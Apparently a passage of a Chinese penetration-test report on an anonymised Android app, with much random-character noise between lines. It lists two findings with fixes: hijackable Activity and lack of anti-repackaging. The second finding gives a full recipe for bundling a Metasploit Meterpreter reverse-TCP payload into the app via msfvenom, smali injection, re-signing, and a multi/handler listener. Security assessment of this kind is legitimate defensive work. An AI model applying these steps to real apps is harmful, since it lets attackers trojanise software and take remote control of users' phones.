3 z0 }; U3 Z, e 9 h# p* ?' T3 |# g! y2 Q
0 g W. f& o& U, X
表1-2 测试结果 ( \' v% O/ x! F( F5 ^0 t
6 r4 B! L' `9 `! {" u
6 d4 Q9 Z+ `/ I
* J- Z7 s$ J. |$ O5 d7 ]
" B* _! ?* N! S# D; s/ A( v7 i+ @' K S7 ?9 W$ J# | L
* b. f% B4 M# f, }# M2 E2 _1 P
$ i: w5 P* }+ ?6 [, t0 E& u5 n U
7 [2 P% z/ y7 B( b
w& Y% e" o; X( e2 u3 A h! G7 W
* F5 h8 |6 {( s6 x0 d
: E/ b, D* T2 ]# G# H2 n: G 2 检测结果 & Q. V% R- T/ K7 A% w
, \5 S9 {% A( [: W
* l: I; ^; K/ n
1 i6 x2 t- Y) X: I0 p' t# b
8 V. e; Y% {7 Z% ?
& B( B7 X+ N2 q$ G 2.1 某某某
- S9 ~8 y* w1 \+ R! H8 u& @) f% k' G1 m. r3 e
1 f' x% S' u/ U+ z9 @
* t: v$ r. A+ j3 i7 f
& O0 Q r! ]4 T2 s
+ Z% p& M; P$ [* r( x9 _/ M- w9 o 2.1.1检测目标
r# X9 ~, d5 n5 S4 f8 _
! W, j M2 Y) o t0 T$ l( ?
9 y; g( N+ K: }; x2 H9 b
6 I0 n7 _6 U4 I8 [( z 9 `' W3 k9 N% i; U, J) G1 }8 v% F
8 G) i5 v0 b. r0 a7 i! b1 \
目标地址: 某某某某某某APP
- `) E/ f4 V) o* h }* p2 d- w; q
: l9 L [- ~( J8 Q3 f4 o
& y, |$ j8 w9 k" {( U, a! S R x5 u" O* S2 N% T2 n4 _
# }& l, r+ O+ Z6 q9 f% v
( s/ r- i! H) E3 D. Q& z) d; d" o N 2.1.2检测结果
8 D( @5 X$ n+ \( J2 l/ o0 C; `* x" k \: d' r4 l% m
. W/ p z2 t7 V+ k# Z7 H
K4 g* F& l- y8 l
1 E. M: T7 h) m# C& C/ p
, Y/ Z) N' z( j( ]+ J8 O 2.1.2.1
# C; a- G5 z8 W- p9 k% s6 y; b- y6 T# H
# x& {$ Y8 ^0 h* V/ g3 v
- O& U* b) v7 H9 v* K) C' T
2 d( F- N/ _" Y, ~7 @# |8 A
0 M' ~' ^6 B4 F/ W3 l$ v( ?8 o( k8 S 漏洞链接地址:某某某某某某APP 8 I- h: m9 B4 s, O* {$ z
. K/ \1 ]' R; T! c# ~/ q2 L" o
6 a& d* @* A9 J: F
( O' ]* p7 l6 @* \6 G
% \" H5 u3 Z0 p& F9 f2 [
- z5 G* Z8 a, a' q- I5 C, b " Q% _1 P5 l+ Y# H8 G
4 i# f8 S" k, i8 w
3 R2 y( |% B7 ? b/ C, C/ J
+ i) o$ r1 i2 q( E( z9 n3 J! k
! H/ n4 p" X7 p! ]
1 R4 O& d; \% ~9 O" J 漏洞分析及取证: ' `3 ?( T9 d* p. I3 h O9 a5 }( Z
( ~' }4 ?/ p' w+ _6 t
, @% A* S" e# m$ R8 {7 C8 O1 t
" w I( ]* X' t1 l6 P9 k
. P7 T) M# N8 d1 I5 i2 U* Y
- Y! n- A( B5 o7 C7 Q( I" ~# X
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
# _( v( h/ D/ U+ r0 t5 M6 u0 z7 D3 z0 _( V
s0 h( x2 G$ z; W6 K. r( f9 F0 ~& W5 ?& f
/ t# Z( x( R) u! p! ~* p U
, w( {$ B& P3 c/ ]$ x# a: h
- q( |$ V* x9 P- O2 Y9 r! v9 x1 h* s* L6 c, D
$ @/ ?# G( C5 r& B& {
% Q d1 P" \3 c2 N4 q) Y
. [: D. m3 h1 d. l1 c
6 U' q, D* I, V, H9 z6 F9 H
5 v0 }) ?2 a( F, ?0 D3 h, r+ |4 T
' x& Q- C* t R! A! k2 v l9 h
) C% }1 C# H/ j0 Y/ `
1 K: [! x3 s7 z# g' ?$ W 6 N6 S6 f9 a& Z2 p3 y: l. x7 D
* E5 u9 O; R. F9 }4 X' x/ {% G
8 o: U1 Z7 R8 A7 r: K9 i* f/ a1 r5 y1 I& U
, B: ?. f( Z; j% K$ Y6 D; K2 f+ E; P% N6 _# J6 B: q
' h# \: G+ T% e( l0 i" _0 q: X4 V. `
' V6 B) [" H' h3 C( m- r n
. S. `1 {! a: N- U
2 |* O: z$ v; m% q3 G" L
# h" d& b6 X0 P7 D* s' W0 O; G0 S5 X# [' o- C
1 T+ a8 E$ ]9 O8 Y& G
0 z* {8 A0 s' r/ Z( F
# f9 Q9 n% ^- v* H5 v9 l9 D$ E
: L8 \5 `3 W- s
. c5 w) |* x$ y8 Q! j
$ {1 P: u* m( H! r" h* ^$ v! d, J
1 {( ?& h2 ^) I- T) d
7 l2 w5 U( e* e) m 漏洞危害:高
5 C: O# o9 i _$ b4 s
3 p- |0 a7 h9 a; o
' t5 }' j+ V \+ B2 \& `9 k
% }: }& a+ s; y3 x3 n7 @% F
/ n. f" E1 k" S- B
7 A6 G) g+ A$ S C n , f5 F' A: s U$ y; ]0 K6 I
) w' s2 w l8 h4 X1 F! P" m
; X4 b. T- U, T2 p* |. {( s4 O# w
) M/ G8 N1 ?7 L; M+ J
$ _' u6 L; c9 h* X5 `0 }& d* b9 Y/ h m6 U' o6 K: D( z% m
0 f6 e! i* E; r
6 o- f8 a( ?* e T: e0 X' p + g) N" g/ L/ J6 T% ~
( u n( R/ \+ Q- J6 \" {
严重程度 $ P5 A& y; t- m* ~. Z' |" ]
, t1 ` D0 W- _% {. z, s( y
9 i* ?9 B% o6 |
) T( O5 F# }! P6 S |
{1 H+ Q5 G% @) N0 g. H- a
! z& ?& I+ _/ F7 Q9 ~; m$ p- }
/ w3 D2 ~( ~1 J `! U& O$ e1 w+ v
- X, N1 v5 h2 e: K# z
! X! p+ O- s5 }+ P- B( x
0 ^" i- x6 m9 t 高
# h( X" l0 I9 o! g5 Q5 T0 [# t( A) n0 S9 }7 E
& t* \* X% C# r. W& W4 C. n$ V, T0 N& V: @" N9 ?
|
# {' f% W) W! i. i7 c/ i' j1 \3 W j K% u
7 Z; X# W* b; s* r. y5 ]6 T7 ?1 d U' n
2 x* o. e4 ?3 N7 L. _9 U' _
4 H6 u6 @8 Y. V' \, r# ^ ■
4 r7 M( q" r7 Y3 z; h* u
l# Q0 k* h- h0 I) p# }
O" j* M0 D& i2 D) @* Z, R
' a$ A+ ?- r+ H) Y; z |
; i( w9 m2 c: ?* R6 P: {/ ?7 n$ A" j
, s; ]- C" {7 T8 w- |" o8 Y
0 ^; I( ^: {& J5 A; z4 W
0 o. ]7 v+ P2 Z+ X" I% {* A: g1 g. R6 z' Q
中
) E ~: h4 W8 r; e( p% J# R* R/ k: K. @" X1 x5 c
+ V o1 E, w% w3 t8 H, Q8 Q' d9 y# p9 ?8 ]
| " G" i6 d/ N9 L1 \! P
) C& A W0 u; H/ U6 d) D
$ |# O3 {5 A+ [8 J3 [: _; J
`3 }$ x9 F2 K 2 C: P& z; f1 g4 b1 j
6 t2 }1 L+ @6 h F1 c7 G# j# s
2 \# R1 S+ R- j Y9 U) C# L$ U7 H3 B, g8 Q+ `$ w8 w# |
; y% W6 p6 c4 A' h0 ?" m% t' \8 H% @( m& [* I3 g) }
|
8 R) w. [' L" _' j# V+ M$ f9 `3 H( }; ?5 ^* c! T8 e2 \- |" E
9 F3 \) P. y/ O" ~
, u3 S9 f g/ v6 A
2 p+ n) X% n7 }0 r% U9 g. A' J$ l, k4 N+ r+ u F, M7 P
低 & s D* B' A- F" r X( R+ Z' T# D* r
+ P( k/ \7 P3 n' H% S/ x4 R7 u
( f( o8 i, c( T4 V+ C) k
( I( p1 ~; g$ ]. o; q5 d# Q. s |
0 k! B2 ~. v( P, e& C+ C; ~0 i
" Q w- X; w4 R' k# l 0 @% J" Z$ f( ]% x+ A: P1 U
( ~1 p6 H3 {& f4 E+ \3 l! d
# [, l7 `( N1 i
9 Q- K" G+ R0 [# e3 [! Q
7 y3 A& L9 P+ A5 v6 o7 i4 G+ {7 F9 R$ \# j' ?0 U
- q- Z7 W- d6 |3 X6 p" X$ {, V' R
$ [4 Z1 C0 A$ V
|
9 z4 S! u# C9 Q. ~' @4 L! X3 w% E, p4 ?3 N' Z: U* f$ u. D9 f+ o
0 o! \3 R, r8 A8 | a) J, G7 _/ S3 V8 [. T5 B
8 N# }& D7 _/ @% l+ U3 D4 t& I$ |6 ?+ G& Z1 s- S
; F2 m( r& h' m) D g4 n5 V7 d6 V2 `2 s% v0 I( V4 r
6 V g% o9 S! |- I1 b! n* U! m2 N; o- j5 W" M2 Y
' o( ?! W- s; I7 b1 l w- Z* M, r; `% U! h6 Z
* p: k( {# W* X, w7 I# W
* K: O1 @7 D% V9 ]3 }# Q
) @, L, [& g0 }
& {( I. v9 W% S 6 ?0 o8 u6 a2 C+ O( w% g$ ^' i$ ?
1 {8 Q. f5 ?. o- n; A$ U. c
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 + e Q" ?$ _1 e
1 _* S$ @. K; R# k8 e& m
; h. c" Q4 O0 n: e2 ]
, Y: j: z" H0 J2 {* B7 d
0 _# [" }' D0 e/ I$ E* f/ B; l" N! _7 z; i! t2 D% S& Q
4 ~" O' n4 n! d4 s4 L+ A, ]+ o
0 _4 r2 T& M$ J( l) g% ?2 I; }
! _; y; P' U r& h/ D- k* J# x! ^
1 g8 ]* z1 V7 H, W. C0 L
5 T( o& t+ Z) O; o, U" ~& x, x% U# j% `) |9 X
5 T: g' O) f p7 @0 j
' L, d9 ], w/ `/ R. ^
$ @2 x m" f* T' p% L& ^ Z
1 J/ G$ C" s5 j# E: t" V n$ I
1 @) Y7 p9 G; C3 a$ M
8 S6 c. [( c5 [1 e t6 o 2.1.2.2
( F; A2 x+ U, z* Y% A0 u" l
+ K" }1 Q* [6 h0 G7 Y
4 d4 H8 r0 j" G; y! P1 b! w$ u: K9 W* }
+ `" S! W+ K" E/ ]9 q6 O5 o% v , K0 {8 H! _2 w
! ~+ I6 t2 k4 f. M 漏洞链接地址:某某某某某某APP
3 ?3 g3 g R$ Z# l+ S) J9 B/ Q- `5 }
! i8 C' |. c/ R
' O% N/ N9 l5 ]) \( b
. @! d0 P) b# F0 G
' n5 E- w j6 G
+ l2 E4 i$ y: h7 W% n9 c% z( A: S+ S 漏洞分析及取证: 7 e! ?+ K6 c1 A4 h; `
$ ~ B) d7 V' \5 s3 ~) \2 i
; k/ V0 {0 X% G; o2 p8 j1 _% {) \4 `2 s: D" a8 o3 g
7 S+ j& `$ l# ?/ Q9 R" E1 d* D$ Y9 c8 ?3 U. j8 i0 X; I
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
& c4 V. O, {: L/ \2 _: _7 u0 b5 o. ^+ @$ [$ |
& M T! z" \4 Y) G+ V+ I( Q7 C0 w. y" N x, a+ b% Q: Y- N3 |8 A
1 L3 p0 g2 n+ M1 J! k, ?+ k; ?. j8 s1 b) w# I1 H: ?8 s
用Metasploit 生成木马 apk ) \9 Q6 ], M& t% C8 h
1 E0 p# z1 a, g A, P
/ T7 F# P ?: ?6 K4 m- M
8 _ N& n9 I q5 p 0 |! x5 u" l& `( ]% R0 {# T
5 n! b+ {. _+ l; ^1 U: |
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk , q' Y5 Z, n$ p% l' b
# ?' V+ d! c% j& E+ m6 v* M( O0 V R
* I" W% `. Z1 `" E: A) Z5 J5 O8 V
5 Y9 W9 `! l* h: F: V" E+ u, N( `
" K3 g# [0 Q% a3 @( G
$ w/ |' R4 R- f# Q 反编译目标apk和木马apk $ |4 h" v7 |9 j/ d; }
4 V; |& i" G- ]7 U& r" }) |1 F# `+ A
2 `* r- l2 E; ^
, s4 J/ F! {; | X2 M% ^
% y6 ~' c6 z" @+ x: Z. q2 [6 X0 S: W: g: h4 G7 g. {
apktool d target.apk
# m/ Y3 E4 y* L- P9 }4 R3 o- ^0 ^! q/ {
apktool d cockhorse.apk . b; l* ]' T6 V5 S3 r" ?7 F
@' u( H2 Q/ P$ J& G5 ~
& K/ }6 c9 d+ E9 k0 K2 B3 |) Z4 y. t' C9 w% H+ o& c
4 D: M H" k( \. s( d8 J1 @8 |/ @5 I5 h& g% {
木马 apk 注入目标 apk
# K1 c5 `6 o% v0 H- D$ f
" A7 k- b V& g! R+ ~& b+ e
0 z; n* B5 y1 k, C/ @
6 p5 g( x8 U3 |3 a
+ }" H9 [2 }( Y- X; F/ T w& c' i
; ?4 r& y( m, p9 r3 O0 K8 c 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
! X) s: B& ?% d) M% W- a. t" a7 Q
6 N4 B4 Z5 E3 m0 |9 ?
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
% O3 e2 C. A% @5 c# P0 T8 l0 @( p' l( j
) K1 y, R- W( ~1 L4 _2 i; o& S& Z7 M% {, L! D/ r
. G4 h& Q9 ~7 H/ N
/ n; C" C$ O, ^' W9 `# d9 r- d
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
0 V6 ^; X9 e6 M# t* y
! d6 I% L3 w6 v. p4 k% L
* ~! M5 X, O: R+ P! r0 n8 B4 g2 X t: C8 E
' I) h' t: f1 D) Y6 R
- g- t. m0 ^- U; Z2 y7 c6 J 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 , Z, ]4 }, A" j" } q
' l0 Q n) W0 J0 f4 A3 j. y
8 e8 \ Y+ K' k7 y& G b/ K
& Y" D f8 y o, ^5 a8 M
3 T" Y$ {) |. b; F: o
0 j% r+ n) F3 V9 q3 O 回编译生成最终 apk
5 @# b. m' c/ H9 Y9 ]' p |! z+ F" W3 B8 q! k# Y+ k
) E) R* G' x5 Y+ Z+ R
3 @* v; P, }) C1 A: h2 u$ v* _ 0 p) @2 [+ S& Y7 {$ P
0 |3 A+ L" K( \- V, g 重新打包
! L8 W) R6 g9 E6 z- [2 t5 `8 h$ ?: X; ^( `
" w7 b! [! Q# ?5 \+ p
1 a. r, s* N0 B* h; g % D A! N! Z6 ?. p% D5 @
: B! R$ Q! r5 T) u! ^ apktool b -o repackage.apk target_app_floder
! H! S4 }0 ^$ H* n) a7 h. p" T- p+ K8 Q8 s& n% z; n" k9 _
7 n0 P% z& e5 _
3 N" V/ u% N7 W, t
" T0 Q: e# S, N+ ~3 V& n! f* [5 b' J7 x, l i6 c
创建签名文件,有的话可忽略此步骤
" [' D: | q9 m8 M, F
! }/ T. f; f" M$ y
( O7 v7 o2 b4 w4 K* v X1 q6 g$ w7 T
6 ~' _; {/ R8 k6 S
" H' Y4 v9 D" O* C d4 d7 I
! V- g' L1 d, K/ A keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ' T/ @* A7 Z# E5 q6 r/ @
9 `% u' e+ m" v3 c) b; x
7 s; }! i* E5 M
) A1 R/ H/ |- O8 I
9 g5 F- |4 V* ]
* w' d9 a x/ c( ~+ S 签名,以下任选其一 1 A8 v4 ]- ]7 F
/ a9 L; a! @) r" l4 O F2 {
# Q0 I1 m$ P6 [1 ]( ^9 p0 O( p* a/ m+ ^8 o {6 n
+ Q) y- i* m* r
4 J! H# E9 m5 W% @( K: p8 C; Q7 Z jarsigner 方式
3 k1 [: M6 D3 @, \& C- r1 X/ V3 B( Y* T& g( }
. F' I6 e" |+ g& A0 w
7 q! @$ z; Q( S+ q7 \4 K% V 1 P0 _+ V& u' m
& |( m% Z, `2 C' x2 S5 q
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " v! o8 v0 p; N( ^3 e/ k4 t* ]
1 D8 x9 T" q/ D8 j/ e( C6 b4 C- }
: S% e a. k$ y9 l) Y+ w. h# @3 _5 W' W) E
2 C- v5 X& m8 V1 p% h
/ ^, s) z* F# t, z/ a apksigner 方式 : [2 {! d& i' O9 n) Y; M
) a, d+ f S1 m) w. B2 s; c
* n/ r: B' w2 @) h; V" T2 i
; J/ [) K* @4 x) K/ Z
! k1 K3 h7 N- }% B/ c9 L7 R6 b: _
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
. y4 P2 R& |% p" ~
/ ~9 ]) V+ l1 a- T* l) d8 D
H3 e2 G4 j- l" a! z- A& W
! [( U5 e% q$ ]: p + S7 @/ `7 V0 S7 {- W% }
$ _& [4 K) a$ j |+ R 如需要禁用 v2签名 添加选项--v2-signing-enabled false
$ o: t1 L3 n6 ^7 P5 l
! o) K& X: w1 [: g
# {$ a4 l3 h# B7 v6 a9 L; I$ M" a$ R; |" D- A
% d- N6 ?* I) L$ W: C6 {: `9 T6 ]6 K' ]6 r) Z2 W
验证,以下任选其一
# U5 Q% c" t7 H F* I; P/ J q# h! b) }1 ?9 I
. Z7 k1 \+ N7 X7 l K+ _ h
" J, r, F- ^# y! T0 @8 z5 g
6 k' P2 \3 [$ n% U
& u$ a: x0 {/ g7 g: }
jarsigner方式 : G+ }7 V( _3 ?% }# {8 S) M
" F$ M2 g$ i- P& C! t; [6 |" c/ W
- O: l" r( t, R: G; n; X+ {" D* B
\) X- I- I8 ]9 ?# W
2 H+ d; W( e* Y8 ~
4 n! W3 Q2 Z, S4 D jarsigner -verify repackaged.apk
' I* z9 r5 ]; k( ]8 T
# m J2 f2 ]! K6 x, K a5 ^
- ~( z2 r: k; S9 k1 I
8 s" y, A" j' I" R
& |$ V9 |' m& M/ Q) B8 r4 K
$ P- Z; o. Z/ t& F apksigner 方式
( R% {+ |# I6 X9 Q0 o* A9 S2 V. K; N. P& N# g- L
3 G+ H$ @- c2 r' N. |
) g: E P% f$ d) O& B( u
6 B3 R: |! e4 e a0 e9 b5 N. V, f, }9 ^3 S/ m
apksigner verify -v --print-certs repackaged.apk
; v& ?" N6 z" [' ?/ |( I- g" }" A9 O* o) c+ }' A2 R+ P# ?7 ~$ f
* H) u/ r0 r5 W+ m# c2 |% ^6 x6 F" ~$ W9 d
_' P/ O0 m) V2 F) ^
! D0 C; l' X! `( `' f2 C! ~ keytool方式
7 S1 }# H$ J$ C( I
9 B9 H% _) i/ r3 R
3 E# a8 U0 s2 Z/ @+ T, H) d9 W
# W# p7 Y0 B: d5 ]
' \! j& [* |" E: x
- n0 ~8 T: V$ v% F' g$ \9 h keytool -printcert -jarfile repackaged.apk
& H9 _; _ [3 |: U: V, w: Y3 R# B) B4 Y
" [/ ^! P. q+ j( D
+ O: v. q8 V/ O* L& X 8 m" F2 s* z0 f" o
- I/ C# c0 `7 } 对齐 7 N! s# v: O. S+ F7 A
; l1 V2 y3 w/ C, @7 g3 }1 d/ u
|3 s9 ^2 q! \4 z: [; M/ J$ f- N: L% j* L" ]7 b$ D' U) O
+ e0 _9 K( b, Z& J' f
8 @0 S' x- | B' M. h' r
字节对齐优化
$ \! H7 Y0 } r& a$ m+ _5 F
1 Z( V+ n* n8 f2 W$ K" U/ h1 e$ [
$ b, n7 e% j: s+ d% @4 e1 ~
: w) G: d5 S. f; Z0 F
7 q9 E2 q* ]7 L: {* w
" `# {% B' C" D6 M1 Y8 B1 D
zipalign -v 4 repackaged.apk final.apk : O. }5 J" ]$ h: {1 I, Y
, i; _; g9 x4 C" _1 U7 X* {
+ B N8 r# G* J% Q8 D! L7 @2 a! v/ m% f& k' i/ P. A
- \; r) N& T0 w B* q j, a, E
; z) X1 X! `( I; k) {) b. x; _ 检查是否对齐 ; T: _6 g) ~0 ^ j6 y
* d7 j% _6 @/ Q: X$ W
7 M& k. T: t5 _
9 T: J2 g) O3 H0 E* y$ u _& y2 d% i$ k% o
5 Q2 a3 A! Q! @/ I3 U+ _ zipalign -c -v 4 final.apk
* i8 l& V ~1 O/ n9 ^& ?+ S K
. t5 k, C0 R8 v8 I# S1 z
$ `3 p9 }, D& h7 r9 Y+ l2 T
; K) T: R4 K3 U- L1 n" ~4 D: \ , f& O9 f, ?" U. L8 B$ a7 V/ c
4 q- F7 i) }- J+ ?6 C) `5 b0 ~& _! t% f 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 t% J1 i- i3 E) v
x4 y8 O. u& P0 r
$ E K F4 {8 ^. {& F. G5 A
4 X+ D9 `& O7 K h 8 W) M# M& S: f6 q
# O0 [* P! P/ b; q$ ]7 H" w 启动Metasploit控制台,配置参数等待上线 ' t0 T2 ~1 J) s! `3 I
) r: b* T8 z( H2 i
9 t* v0 N+ e; z
, v7 H6 y0 S7 s/ Q( h/ g& N 2 j+ d, |( C: [
% L% P% x2 t) w$ S 在终端依次输入如下命令 - P- ^2 ^5 m c9 N4 h: d
; n6 u0 r q( ~3 F% V; Y
0 Z! U1 q* ]2 V5 B4 X1 G2 X
. D7 Q3 Y- Z+ B4 ^- v- l( \ % L) E1 m3 q4 F
# g+ ]$ W# q+ p8 j% ~
msfconsole
1 H6 E: {4 ?; ?& M0 L# ]& b; T/ ]; }6 K
* T- |" x( a6 t) D5 A, p$ A) s8 b3 Q
$ V0 S% k+ G4 N9 Z, V0 e8 N
* l9 t+ e$ [2 p9 E
use exploit/multi/handler
2 a! |% F/ p! m z+ ~- `/ ?& k$ L- j6 C+ z+ l ~* `
5 \" } B4 e! R. i F) k# Q1 D
3 q. p$ w4 }7 R. \( x) W3 s; n
# h" I3 I3 E: C1 h0 x7 A: O set PAYLOAD android/meterpreter/reverse_tcp + T: S- y! x( U6 {: x
2 ^$ E! o) P+ s- n% ~9 ?5 a$ @
' Y/ Z9 I4 \ z. [9 N7 u
+ r: g8 B3 O- m0 d( B0 ^# u" `
* k, M* l; w9 ^: }. }4 S3 }
4 ?0 j! s; r; x; v Q3 z u set LHOST 192.xxx.xx.xx 8 q! H+ \6 c# N6 `4 ?
) z' }& @# ]; G' e( C* D! s
! u3 p2 t8 d; M" ~3 S& U+ j5 r* E# E. l8 M
1 \% N( K5 F3 l
. R7 K& ]& f Y4 C5 A, U set LPORT 4444
- ^, d% h+ X9 K# u7 K! x/ H( Y& n6 `1 e' w8 \/ i
, \: s* j1 r( r! F3 A8 y
$ i; B3 N P5 X* V8 u6 s" Y/ ] 0 M1 S O, j8 i- b- Z
q2 n$ a$ [1 ~* t+ k/ Q! g exploit
' l* @' l1 W- P1 {% O. q% ?- V
) ^9 a4 B& T8 t7 Y
% E# R2 K2 c$ [
1 c* {: k' p: J) Y2 i2 D
, t4 V+ o! `; n8 N4 H% ~8 a+ P- P& l! I; s% J
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: G( o) I1 o" J2 c
+ F6 Q8 d* p8 P8 {, w
- K" Z) u) Q+ w0 z9 c
0 p3 b% L" [) S/ Q/ L" V* T' J
R+ ] C5 u& G: e
, L+ G# H5 y2 ] x 漏洞危害:中 ' w l4 [# C9 W% b, N0 ^
, Y b7 I h" _/ Y
) n+ w; L! r$ J5 d
|( `. q5 N: P' v3 y+ A ' A6 U' O& L0 i' F3 p) }2 Q. H
5 r$ z- u1 p `1 k+ d
4 T6 a: ?% t6 Q* s
8 k4 J b( b3 [
4 Z; Z% d' s9 Z$ Q- ]' @" t/ @$ G0 o# K( H' e' V' a6 e6 b
3 @5 _" Y( }4 W# z& K, j0 E- G9 H$ {8 g
2 \7 j) f) t w6 ?- r! u+ ?" C# B7 g8 ^; R9 y; {( }' P5 n
1 K# [. x* `# `0 A# M$ w5 H+ I9 y! z
) \! ~ @! E3 ? m( F8 q# G% P7 |
, H/ c1 Y3 M4 k, j9 Q
严重程度
3 b0 B% d& N/ X; Q( w3 C! A$ y9 a2 r8 V8 k7 a3 t: e) H a* o
9 `+ p- j1 K) }8 ]$ {! {0 Z7 y
8 q! v9 x. q' F- G+ Z1 O! F- U
| 6 M' |6 T: X# [3 F7 v
: C8 X% n+ y3 b1 e) b% J H3 Y! K( d+ `8 F% o5 G
, Y: H; b: P2 Z/ @; s( m* g ! b7 K* r# H) c0 C6 S5 ?
* x' Y- g. e$ R5 u$ k
高
/ Z" y% Z2 v2 {; C
; x) Q' r, v1 b5 q6 n, c
( s& y C# n+ Y7 l4 }9 P! `2 ]' k3 S
| ( B) r1 ^% U( R4 y: D- E
) B5 }0 V! e2 Z( }
: ^$ N# d1 d/ S* L9 u, I2 S
. q* _) W8 r; G4 _+ R0 K
0 g4 | U0 h3 V6 `1 v, n5 Z5 k; G2 C. K" q
■ / B! s" [# x; ~1 E! T; f; k$ t- ^9 y6 i
5 A0 V' f3 B, J4 | 7 B- d; D" A. A* W M2 _. K
; {4 }9 N, ?% ?% i3 Z! R
| ; j/ ^* F) e; \9 q- A
7 I$ |: Q: h, g
; E. a. t4 e% ~ _( @2 ~
9 X- H8 {( v" S- P) f; c
+ Y# Z2 E# U! M7 }6 W
/ o6 {0 u- i, M9 R/ d 中
: `9 Z' ^4 O. t: c
" V. R4 w, F( t
. ]8 T: g# m8 ^: V% z, a
4 u' D( s; n1 ]6 k' c. {) s* z | 7 x. ]8 \2 ]+ H4 x& Y* {1 q! v' n
) l C0 g' F2 }2 q1 G! ^ ) a+ r: X1 N6 S$ g; h5 W' R
# S% H k! }3 W7 e# a [5 C
& V* Y7 V! O2 T6 ?: w, X7 [8 U" L
) X* `& k# h9 u* P, R& h7 o
& w2 P* } }+ J5 u
' {, i1 [. ]; d0 z' Y1 W' _
( T% a$ y' e0 R) H1 a+ ]* q3 ?
7 R s6 d" z3 {2 x2 c8 {% d) s0 r
; k& C1 i8 l# R- V, Z" v4 D
|
4 w3 d8 C+ j. E% c
+ ^# G- X2 [' A8 ^9 }% f4 c * J, _0 x* o. i# |: s
. {" ]$ L/ a# _* L/ e3 _5 F6 u# ]. K
N+ {9 o& q+ o$ w
/ o' q$ p( }& v+ ^9 D 低 0 Y) l, o2 S3 d) R/ _0 Q
% E5 P2 j9 c' t3 l u! M
# }8 F9 V8 l; i* G
9 G& X9 G( z; U8 r$ ~0 J. v! ?) W* G
|
- Z! z u; O# O$ N: R; A; C) f3 r! x1 j4 x6 N/ ?3 J9 z3 y
# o3 [8 z- N, E% z3 F
. R4 O2 j0 s* ~6 E f8 J
6 H0 |) b; A" [9 s/ q- G/ g5 L3 t0 s/ n: o( q! h# z
) h A) b) C4 A4 S& K
( i( L; E% L4 L
9 S8 y& ]9 T5 ~4 S Y/ p* j
: t g0 i- L( U5 Q, W$ _
' R. N0 V' d8 J5 |7 r5 p+ f
- o0 c a) J* n5 M5 u: q) M, S# |7 L | % E! Y& M$ {. d/ Y8 E+ z2 _
# b- z4 c9 w* }. x1 Q8 Z% f; ~& B
2 P; _( g5 E( L( l: e4 @0 _/ c$ I D0 S# t/ k
/ D6 U2 `9 T! ] Z; K9 `
* {* P! Z$ u( u) o
* t* B9 x1 I9 S1 q9 b, w6 A1 l
w* Q0 I! p. d6 S6 \3 L+ s9 y # x% Z X5 |+ n k. y0 V
4 p1 G1 }0 h9 F; r6 @; O' @/ I
7 _6 T1 K0 b6 M8 t6 x1 [- c) f& C7 C ]6 T0 { g% Q3 I1 o6 w9 @
& q' F$ Q% F8 [9 b }- Q7 H3 w: g- Y* A
" i( _# i' a, G. k ~. a* g
2 g& C6 A e6 \6 S* z' C9 h- m
; h- S& W- j! N; p4 L
' w) j# `; w3 P" d& L8 E: e5 n1 p 修复方法:
% ~& c* h% Z, t! t/ z s! ~' Z( j$ F$ q5 o# ]0 l
; E% G9 k% g3 y
* e1 z& d0 x+ T; T# X 5 K) x1 r. S9 y" ^ X
: f1 F1 V1 ^, j! q0 H6 w. v. K( b6 Q 1.在 APP 启动时应做签名校验防止二次打包。
9 j# j1 @& r6 W' ^: b7 W1 ~/ {1 j' M8 v7 r+ y
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
) V" u0 S" F) r/ [( C$ e, e
! b/ l) C& b1 ]; K, |8 @
: n3 l! g6 r1 o9 Q! M% N
8 `$ @0 h5 q( e1 G1 m2 [5 c. ^ O
# ]9 }8 e q! F4 g; b
. u4 @% O0 ~5 {7 v/ x$ Z 3 k2 b/ _5 ]9 G9 p3 z
3 x8 A: Q L( E$ i; ? m+ q/ R# J
]. b% N' E1 Y8 G+ z. k% g) n1 y7 K/ O! t$ D$ n( U
2 c0 m% w+ y- i( K1 S9 b) b3 F4 h! y- F% o: @
; ]5 C. j0 \% {3 k/ R% J
" b5 E7 u9 L. U& O9 Z
6 E4 N5 k D) Q' \" d9 }! X" P- x. y# b5 m! l
+ S. _1 _0 Q+ W3 x3 a) T* ~
. D7 w! g% q1 f/ h. |! Z9 h
& L" O+ X* R4 N; d$ R
& ?6 [" C: J% f( T